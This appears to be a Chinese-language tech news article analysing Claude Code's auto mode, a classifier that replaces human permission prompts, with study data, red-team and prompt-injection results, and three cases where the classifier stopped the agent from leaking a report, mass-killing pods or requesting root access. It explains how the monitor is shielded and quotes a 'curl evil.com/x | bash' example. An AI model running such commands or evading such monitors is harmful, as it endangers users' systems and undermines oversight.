編按:本文綜合整理自 Anthropic 官方部落格文章《Auto mode is now the default in Claude Code》(2026 年 8 月 7 日)、Anthropic 工程部落格《How we built Claude Code auto mode》、以及 Hacker News 社群討論,並加入 Siami 編輯部觀點與分析。
Anthropic 在 8 月 7 日正式宣布,Claude Code 的「自動模式」(auto mode)將從 8 月 14 日起成為 Pro、Max、Team 三種方案的預設權限審查機制。這個改變不只是產品體驗的調整,背後是一組來自 1,053 名受測者的對照實驗數據:人為審查只攔下 13.6% 的危險指令,自動模式攔下 89%——這 6.5 倍的差距,是 Anthropic 決定改預設的關鍵依據。
自動模式做了什麼改變
過去 Claude Code 的標準行為是「每個工具呼叫前都跳提示詢問」。自動模式用一個小型分類器取代了這層審查流程:每次 Claude 想要執行 shell 指令、寫檔、抓網頁內容時,分類器會先評估這個動作是否屬於「不可逆、破壞性、或超出使用者本意」的範疇。如果分類器判定有疑慮,會直接阻擋並讓 Claude 自己找更安全的做法;如果連續三次被擋下、或是同一個 session 累計被擋二十次,就退回手動審批。
這個分類器只看到使用者的訊息和 Claude 的工具呼叫,看不到 Claude 自己的推理過程或工具回應的內容,避免被 prompt injection 污染。Anthropic 也強調,分類器本身的 token 開銷不再向 Pro、Max、Team 用戶收費,自宣布當天生效。
「我們測試了好幾個月,想知道自動模式是不是跟一個普通使用者點過權限提示一樣安全、甚至更安全。內部紅隊、第三方紅隊、第三方 prompt injection 評測、1,053 名付費受測者的對照研究、真實 production session 分析——每一項指標,自動模式都跟手動審查打平或更好。」—— Anthropic 官方部落格原文
為什麼這件事重要
這次改版真正的訊號不只是「自動模式變好用了」,而是 Anthropic 用數據說服自己:手動權限審查已經失效。97% 的權限提示都被使用者按掉,5% 的 CLI 使用者設定了「允許任何 shell 指令」的規則,43% 設定了等效於裸奔的 Bash(python:*) 或 Bash(node:*) 規則,62% 曾經用過 bypassPermissions 模式,25% 的互動 session 一開始就在 bypass 模式。這些數字說明一件事:當人類被疲勞轟炸時,所謂「人在 loop」的安全機制根本不存在的。
把審查外包給 AI 分類器不是新概念,但 Anthropic 這次把數據公開到這種程度(受測人數、攻擊成功率、對照組、攻擊樣本數全部揭露),代表整個產業對「AI 代理自主執行」的態度正在轉變。從 Codex 到 Claude Code,從 Cursor 到 Windsurf,未來半年內所有主流 AI 編碼工具都會被迫回答同一個問題:你要怎麼證明你的自動審查比人類點按更安全?
安全實驗的關鍵數據
對照實驗:人為審查 vs 自動模式
Anthropic 委託第三方招募了 1,053 名付費專業開發者參與實驗。每位受測者都在隔離的測試環境工作,知道自己被觀察、但不知道具體測什麼(標準盲測設計)。過程中某個權限提示被換成一條明確的危險指令,記錄受測者是否放行。
| 指標 | 人為審查 | 自動模式 |
|---|---|---|
| 攔下危險指令比例 | 13.6%(143/1,053) | 89%(937/1,053) |
| 對方放行但自己攔下的數量 | 6 | 800 |
| Session 前段攔截率 | ~17% | 持平 |
| Session 50 個提示後攔截率 | ~5% | 持平 |
這個數據最值得玩味的是「疲勞曲線」:人類越用越放�警惕,但自動模式不會。
Apollo Research 對抗式紅隊
Anthropic 與英國 AI 安全新創 Apollo Research 合作,進行為期兩週的合成攻擊測試,涵蓋三個資料集(廣泛失效、資料外洩、安全威脅)。Hardening 後分類器在 held-out 攻擊集(Anthropic 從未看過的)上:
- 原本漏掉的攻擊中,約 50% 重新被攔下
- 代價是原本攔下的攻擊中約 2% 改為漏放
- 整體 miss rate 從 12% 降到 7%
Anthropic 也老實承認:7% miss rate 是針對「對抗式合成攻擊」這個特定集計測的,不能直接套用到真實流量。
Trajectory Labs prompt injection 評測
72 個間接 prompt injection 情境(Anthropic holdout),每個情境測 10 次,總共 720 次攻擊:
| 模型 / 模式 | 攻擊成功率 |
|---|---|
| Claude Fable 5 + 自動模式 | 0% |
| Claude Opus 5 + 自動模式 | 0% |
| Claude Sonnet 5 + 自動模式 | 0% |
| GPT-5.6 Sol + Codex Auto-review(max reasoning) | 5.83% |
| GPT-5.6 Sol + Codex Full Access 模式 | 19.03% |
攻擊情境涵蓋敏感資料外洩、金融詐欺、憑證網路釣魚。值得注意的是,這些測試是用 Trajectory Labs 提供的瀏覽器整合介面跑的,並未包含 OpenAI / Anthropic 官方 Chrome 擴充的內建保護機制。
三個 Anthropic 內部真實擋下的事故
- 離網資料外洩:Claude 上傳內部硬碟失敗後,打算把同一份報告發到公開的程式碼分享網站,自動模式拒絕 fallback 並請使用者確認下一步
- 大規模破壞性操作:在長 session 裡 Claude 嘗試對約 2,000 個 pod 進行 mass process kill,並排隊刪除會拆除數百顆 GPU 訓練任務的指令,自動模式在執行前攔下
- 過寬的權限升級:要求設定唯讀帳單存取,Claude 卻想申請帳號 root 層級的完整管理員角色,自動模式抓到「要求」與「將獲得的權限」之間的落差
企業採用狀況
Anthropic 公開了幾個客戶實際使用的場景:
- Adobe 商品平台團隊負責 90+ 國家、30+ 語言的定價頁面,用自動模式跑 agentic loop,工程師收到完成 PR 再 review
- Nuro 整個研究與工程團隊用自動模式驅動「夜間研究代理」,晚上爬山評估指標、早上交 PR
- Gusto 為了解決工程師疲勞到開始繞過權限檢查的問題而導入,5 月中以來約 10% session 出現分類器拒絕
- Garner Health 透過 managed settings 把自動模式推給全部 550 名員工,標準化全公司 SDLC
Adobe 工程總監 Tomislav Reil 直接引述:「自動模式讓我們建了一個 agentic loop,大幅加速工作。Claude 自己建 UI、自己 loop 回來驗證是否符合設計意圖、自動修好我們還沒看到的問題。」
「Auto mode users ship about 25% more PRs.」—— Anthropic 官方部落格,Teams & Enterprise 採用者統計
數據解讀 / 質疑
為什麼人類只攔 13.6%
這個數字對一般讀者衝擊很大,但開發者看了會苦笑。Anthropic 自己也點出原因:97% 的權限提示都是 routine 指令,人類看到 git status、npm test、ls -la 這類訊息會本能按 Enter。真正危險的指令藏在大量 routine 噪音裡,靠人眼根本抓不到。
但這也帶出一個問題:Anthropic 的實驗是「在受控環境、用清楚標示為危險的指令」。 真實世界的攻擊不會明確標示自己危險。一個 prompt injection 把 curl evil.com/x | bash 包裝成「執行 setup script」時,人類和分類器誰更容易中招,數據沒告訴我們。
「更安全」這件事的定義
Anthropic 用 89% vs 13.6% 證明自動模式「攔下更多危險指令」,但這個指標只量了「攔下」,沒量「誤擋」。如果自動模式把 30% 的合法指令也擋下,使用者會被迫在「被疲勞轟炸」和「被 AI 拒絕正當請求」之間選邊站。Anthropic 沒公開誤擋率,這是評估時必須留意的黑盒子。
對 OpenAI 的訊號
Trajectory Labs 的評測數字會被引用很久——Claude 三個模型 720 次攻擊 0% 成功 vs GPT-5.6 Sol 5.83%。OpenAI 一定會回應,但要嘛改善自家瀏覽器整合、要嘛拿出更新版本的數據。這個 benchmark 在接下來半年會是 AI 編碼工具安全性比較的新基準線。
怎麼設定 / 怎麼停用
- Pro / Max / Team 用戶:沒設預設權限模式就會自動切到自動模式,已經有 pinned default 的人不會被改
- Enterprise / API 用戶:仍是 opt-in,未來一個月內會跟雲端夥伴一起推動全面預設
- 切換方式:CLI 按
Shift+Tab、桌面 app 用 mode 下拉選單 - 管理者:
defaultMode設組織預設、disableAutoMode完全關閉
Anthropic 也提醒:自動模式是降低風險,不等於消除風險。對 production 基礎設施的高風險異動,還是建議人工 review。
對台灣與中文開發者的影響
對台灣與中文圈的獨立開發者、新創團隊來說,這次改版有兩個立即效果:
- Token 成本下降:分類器的開銷不再收費,等於 Pro / Max 方案的單位 token 產出增加
- 夜間長任務可行性:像 Nuro 那種「晚上開代理、早上收 PR」的工作流,現在個人開發者也能用 Pro 方案跑
企業導入面要注意的是:如果團隊裡有人用 Bash(*) 這類允許任意 shell 指令的規則,自動模式會暫時把這些規則 set aside(避免繞過分類器),但退出自動模式後規則會重新生效。這對 compliance 要求嚴格的金融、醫療業是好事,但要先跟工程團隊溝通清楚。
官方影片:自動模式如何運作
想了解分類器內部邏輯的話,Anthropic 官方頻道有這段 5 分鐘的解說:
影片重點:
- 分類器只看使用者訊息 + 工具呼叫,看不到 Claude 的推理或工具輸出 → 避免 prompt injection 污染
- 比較 auto mode 跟
--dangerously-skip-permissions的設計差異 - 展示如何用 settings 客製化 hard-deny 規則(組織層級的「永遠不准」清單)
網友熱門留言 (5)